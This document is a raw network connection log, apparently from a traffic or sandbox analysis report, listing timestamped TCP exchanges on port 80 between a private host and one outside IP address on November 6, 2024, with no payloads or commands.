                                                                                                                                                              Nov 6, 2024 17:39:05.406332016 CET8050185150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.423113108 CET5018580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.423639059 CET5018680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.611319065 CET8050185150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.611484051 CET5018580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.611627102 CET8050186150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.611846924 CET5018680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.611931086 CET5018680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.611931086 CET5018680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.800359011 CET8050186150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.800406933 CET8050186150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.869251966 CET8050186150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:05.885413885 CET5018680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:05.885900021 CET5018780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.074212074 CET8050187150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.074258089 CET8050186150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.074426889 CET5018780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.074426889 CET5018680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.074594975 CET5018780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.074594975 CET5018780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.262804985 CET8050187150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.262851000 CET8050187150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.331443071 CET8050187150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.344742060 CET5018780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.345237970 CET5018880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.533041954 CET8050187150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.533185959 CET5018780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.533262968 CET8050188150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.533469915 CET5018880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.533638954 CET5018880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.533638954 CET5018880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.722197056 CET8050188150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.722233057 CET8050188150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.792437077 CET8050188150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.804250002 CET5018880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.804657936 CET5018980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.992906094 CET8050188150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.992954969 CET8050189150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:06.993202925 CET5018880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.993202925 CET5018980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.993355036 CET5018980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:06.993355989 CET5018980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.181704998 CET8050189150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.181715965 CET8050189150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.253212929 CET8050189150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.271138906 CET5018980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.271636009 CET5019080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.459459066 CET8050189150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.459559917 CET8050190150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.459621906 CET5018980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.459790945 CET5019080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.460146904 CET5019080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.460192919 CET5019080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.648015022 CET8050190150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.648185968 CET8050190150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.723383904 CET8050190150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.735404015 CET5019080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.735855103 CET5019180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.924171925 CET8050190150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.924417973 CET8050191150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:07.924544096 CET5019080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.924618959 CET5019180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.924817085 CET5019180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:07.924817085 CET5019180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.113022089 CET8050191150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.113034964 CET8050191150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.187935114 CET8050191150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.201792002 CET5019180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.202564955 CET5019280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.390036106 CET8050191150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.390357018 CET5019180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.390428066 CET8050192150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.390630960 CET5019280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.390752077 CET5019280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.390752077 CET5019280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.578457117 CET8050192150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.578478098 CET8050192150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.644975901 CET8050192150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.659377098 CET5019280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.660130978 CET5019380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.849582911 CET8050192150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.849855900 CET5019280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.850661039 CET8050193150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:08.851000071 CET5019380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.851170063 CET5019380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:08.851171017 CET5019380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:09.039417982 CET8050193150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:09.039462090 CET8050193150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:09.108608961 CET8050193150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:09.122621059 CET5019380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:09.123362064 CET5019480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:09.316124916 CET8050193150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:09.316344023 CET5019380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.135092020 CET5019480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.323359966 CET8050194150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:10.323669910 CET5019480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.323982000 CET5019480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.324012041 CET5019480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.512262106 CET8050194150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:10.512290955 CET8050194150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:10.590677977 CET8050194150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:10.634952068 CET5019480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.760385036 CET5019480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.760993004 CET5019580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.948817015 CET8050194150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:10.948980093 CET5019480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.949220896 CET8050195150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:10.949450016 CET5019580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.949618101 CET5019580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:10.949618101 CET5019580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.137721062 CET8050195150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.137732029 CET8050195150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.206425905 CET8050195150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.217820883 CET5019580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.218358040 CET5019680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.406039000 CET8050195150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.406045914 CET8050196150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.406305075 CET5019580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.406331062 CET5019680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.406455040 CET5019680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.406455040 CET5019680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.594436884 CET8050196150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.594445944 CET8050196150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.662360907 CET8050196150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.677541018 CET5019680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.678040981 CET5019780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.865726948 CET8050197150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.865741014 CET8050196150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:11.866139889 CET5019680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.866141081 CET5019780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.866179943 CET5019780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:11.866179943 CET5019780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.054157019 CET8050197150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.054168940 CET8050197150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.123014927 CET8050197150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.140440941 CET5019780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.140912056 CET5019880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.328102112 CET8050197150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.328339100 CET5019780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.329144955 CET8050198150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.329396963 CET5019880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.329674006 CET5019880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.329674006 CET5019880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.517803907 CET8050198150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.517832041 CET8050198150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.587903976 CET8050198150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.598582983 CET5019880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.599056005 CET5019980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.787065983 CET8050198150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.787341118 CET5019880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.787467957 CET8050199150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.787646055 CET5019980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.787805080 CET5019980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.787805080 CET5019980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:12.976391077 CET8050199150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:12.976435900 CET8050199150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.044441938 CET8050199150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.055825949 CET5019980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.056591988 CET5020080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.244901896 CET8050200150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.245088100 CET8050199150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.245112896 CET5020080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.245251894 CET5019980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.245402098 CET5020080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.245402098 CET5020080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.446540117 CET8050200150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.446552992 CET8050200150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.508073092 CET8050200150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.523032904 CET5020080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.523462057 CET5020180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.724529982 CET8050200150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.724553108 CET8050201150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.724704981 CET5020080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.724704981 CET5020180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.725040913 CET5020180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.725040913 CET5020180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.913081884 CET8050201150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.913094044 CET8050201150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.982223034 CET8050201150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:13.994541883 CET5020180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:13.995019913 CET5020280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.187223911 CET8050202150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.187237024 CET8050201150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.187556028 CET5020280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.187556028 CET5020180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.187666893 CET5020280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.187666893 CET5020280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.375433922 CET8050202150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.375549078 CET8050202150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.446734905 CET8050202150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.475107908 CET5020280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.475828886 CET5020380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.668457031 CET8050202150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.668663979 CET5020280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.669064999 CET8050203150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.669272900 CET5020380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.669435024 CET5020380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.669435024 CET5020380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.857269049 CET8050203150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.857278109 CET8050203150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.933437109 CET8050203150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:14.945195913 CET5020380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:14.945482016 CET5020480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.142827988 CET8050203150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.142841101 CET8050204150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.143259048 CET5020480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.143259048 CET5020380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.143294096 CET5020480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.143294096 CET5020480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.331511021 CET8050204150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.331521988 CET8050204150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.398905993 CET8050204150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.410095930 CET5020480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.410557032 CET5020580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.611808062 CET8050205150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.611838102 CET8050204150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.611972094 CET5020480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.612008095 CET5020580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.612128973 CET5020580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.612128973 CET5020580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.803637981 CET8050205150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.803668022 CET8050205150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.870201111 CET8050205150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:15.882606030 CET5020580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:15.883034945 CET5020680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.070642948 CET8050205150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.070686102 CET8050206150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.070828915 CET5020580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.070909977 CET5020680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.070981979 CET5020680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.070981979 CET5020680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.262432098 CET8050206150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.262449026 CET8050206150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.338125944 CET8050206150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.349385023 CET5020680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.350003958 CET5020780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.537270069 CET8050206150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.537466049 CET5020680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.538626909 CET8050207150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.538846016 CET5020780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.539069891 CET5020780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.539069891 CET5020780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.727866888 CET8050207150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.727926016 CET8050207150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.796305895 CET8050207150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:16.817406893 CET5020780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:16.817833900 CET5020880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.006910086 CET8050207150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.006958008 CET8050208150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.007112980 CET5020780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.007163048 CET5020880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.007324934 CET5020880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.007324934 CET5020880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.203239918 CET8050208150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.203249931 CET8050208150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.263330936 CET8050208150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.275378942 CET5020880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.275886059 CET5020980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.466145039 CET8050209150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.466180086 CET8050208150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.466386080 CET5020880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.466386080 CET5020980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.466573000 CET5020980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.466573000 CET5020980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.656747103 CET8050209150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.656789064 CET8050209150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.718185902 CET8050209150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.732676983 CET5020980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.733218908 CET5021080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.920890093 CET8050209150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.921140909 CET5020980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.923502922 CET8050210150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:17.923747063 CET5021080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.923878908 CET5021080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:17.923878908 CET5021080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.117084026 CET8050210150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.117127895 CET8050210150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.190970898 CET8050210150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.205331087 CET5021080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.206125021 CET5021180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.397866964 CET8050210150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.397917032 CET8050211150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.398123980 CET5021080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.398123980 CET5021180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.398247957 CET5021180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.398247957 CET5021180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.589606047 CET8050211150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.589653015 CET8050211150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.656950951 CET8050211150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.668581963 CET5021180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.669025898 CET5021280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.856280088 CET8050211150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.856538057 CET5021180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.857079983 CET8050212150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:18.857332945 CET5021280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.857494116 CET5021280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:18.857495070 CET5021280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:19.045212030 CET8050212150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:19.045290947 CET8050212150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:19.413805962 CET8050212150.241.91.218192.168.11.20
